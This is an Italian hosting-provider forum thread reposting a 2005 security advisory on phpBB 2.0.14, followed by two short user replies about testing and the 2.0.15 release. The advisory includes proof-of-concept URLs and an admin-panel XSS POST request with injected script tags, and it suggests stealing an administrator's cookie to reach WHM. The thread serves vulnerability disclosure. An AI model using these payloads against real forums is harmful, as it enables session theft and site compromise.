Torna indietro   Serverplan Forum > Serverplan comunica > Vulnerabilità

Rispondi
 
LinkBack Strumenti discussione Modalità visualizzazione
  #1 (permalink)  
Vecchio 24-04-2005, 11.28.52
Administrator
Amministratore
 
Data registrazione: 12-09-2002
Messaggi: 3,420
serverplan ha disabilitato la reputazione
Predefinito phpBB 2.0.14 Multiple Vulnerabilities

/*
--------------------------------------------------------
[N]eo [S]ecurity [T]eam [NST]? - Advisory #14 - 17/04/05
--------------------------------------------------------
Program: phpBB 2.0.14
Homepage: http://www.phpbb.com
Vulnerable Versions: phpBB 2.0.14 & Lower versions
Risk: Low Risk!!
Impact: Multiple Vulnerabilities.

-==phpBB 2.0.14 Multiple Vulnerabilities==-
---------------------------------------------------------

- Description
---------------------------------------------------------
phpBB is a high powered, fully scalable, and highly customizable
Open Source bulletin board package. phpBB has a user-friendly
interface, simple and straightforward administration panel, and
helpful FAQ. Based on the powerful PHP server language and your
choice of MySQL, MS-SQL, PostgreSQL or Access/ODBC database servers,
phpBB is the ideal free community solution for all web sites.

- Tested
---------------------------------------------------------
localhost & many forums

- Explotation
---------------------------------------------------------
-==Bad Filter of HTML Code==-
phpBB2/profile.php?mode=viewprofile&u=\[]\
phpBB2/viewtopic.php?p=3&highlight=\[]\
################################################## #######
-==XSS==-
POST /admin/admin_forums.php?sid=7bd54a5a9861ef180af78897e70 HTTP/1.1
forumname=<script>alert('NST')</script>&forumdesc=<script>alert('NST')&lt ;/script>&c=1&forumstatus=0&prune_days=7&prune_fr eq=1&mode=createforum&f=&submit=Create new forum

Some people cannot find it interest someones yes but well i dont care because if you put some effort you know that
you can do a lot with this, like fooling the Admin of the Hosting to get his cookie & and then get access to whm...

- References
--------------------------------------------------------
http://neosecurityteam.net/Advisories/Advisory-14.txt


- Credits
-------------------------------------------------
Discovered by HaCkZaTaN <hck_zatan@hotmail.com>

[N]eo [S]ecurity [T]eam [NST]? - http://neosecurityteam.net/

Got Questions? http://neosecurityteam.net/

Irc.gigachat.net #uruguay [NeoSecurity IRC]

- Greets
--------------------------------------------------------
Paisterist
Daemon21
LINUX
erg0t
uyx
CrashCool
Makoki
KingMetal
r3v3ng4ns

And my Colombian people

@@@@'''@@@@'@@@@@@@@@'@@@@@@@@@@@
'@@@@@''@@'@@@''''''''@@''@@@''@@
'@@'@@@@@@''@@@@@@@@@'''''@@@
'@@'''@@@@'''''''''@@@''''@@@
@@@@''''@@'@@@@@@@@@@''''@@@@@
*/

/* EOF */
Rispondi citando
  #2 (permalink)  
Vecchio 25-04-2005, 19.02.51
Member
 
Data registrazione: 29-03-2003
Messaggi: 38
Aiencran is on a distinguished road
Predefinito

La prima l'ho provata ma non mi sembra dannosa... viene visualizzato solo il profilo di un utente che peraltro non dovrebbe esistere.
La seconda non ho avuto modo di testarla.
__________________
Aiencran
CranPortal.net | My PhpBB MODS
Rispondi citando
  #3 (permalink)  
Vecchio 08-05-2005, 03.27.00
Member
 
Data registrazione: 29-03-2003
Messaggi: 38
Aiencran is on a distinguished road
Predefinito

E' uscita la 2.0.15
__________________
Aiencran
CranPortal.net | My PhpBB MODS
Rispondi citando
Rispondi

Strumenti discussione
Modalità visualizzazione

Regole di scrittura
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is Attivato
Le faccine sono Attivato
Il codice [IMG] è Attivato
Il codice HTML è Disattivato
Trackbacks are Attivato
Pingbacks are Attivato
Refbacks are Attivato


Discussioni simili
Discussione Autore discussione Forum Risposte Ultimo messaggio
WordPress 2.0.1 Multiple Vulnerabilities serverplan Vulnerabilità 0 28-02-2006 16.51.52
phpBB Multiple Vulnerabilities serverplan Vulnerabilità 0 02-11-2005 19.32.14
Multiple Vulnerabilities in WebCalendar serverplan Vulnerabilità 0 10-11-2004 21.08.42
Multiple vulnerabilities PowerPortal serverplan Vulnerabilità 0 29-06-2004 00.52.00
Multiple vulnerabilities in XMB 1.8 serverplan Vulnerabilità 0 23-02-2004 23.35.52


Tutti gli orari sono GMT +1. Adesso sono le 15.22.25.


Powered by vBulletin versione 3.7.3
Copyright ©2000 - 2008, Jelsoft Enterprises Ltd.
Content Relevant URLs by vBSEO 3.1.0
Traduzione italiana : www.vbulletin.it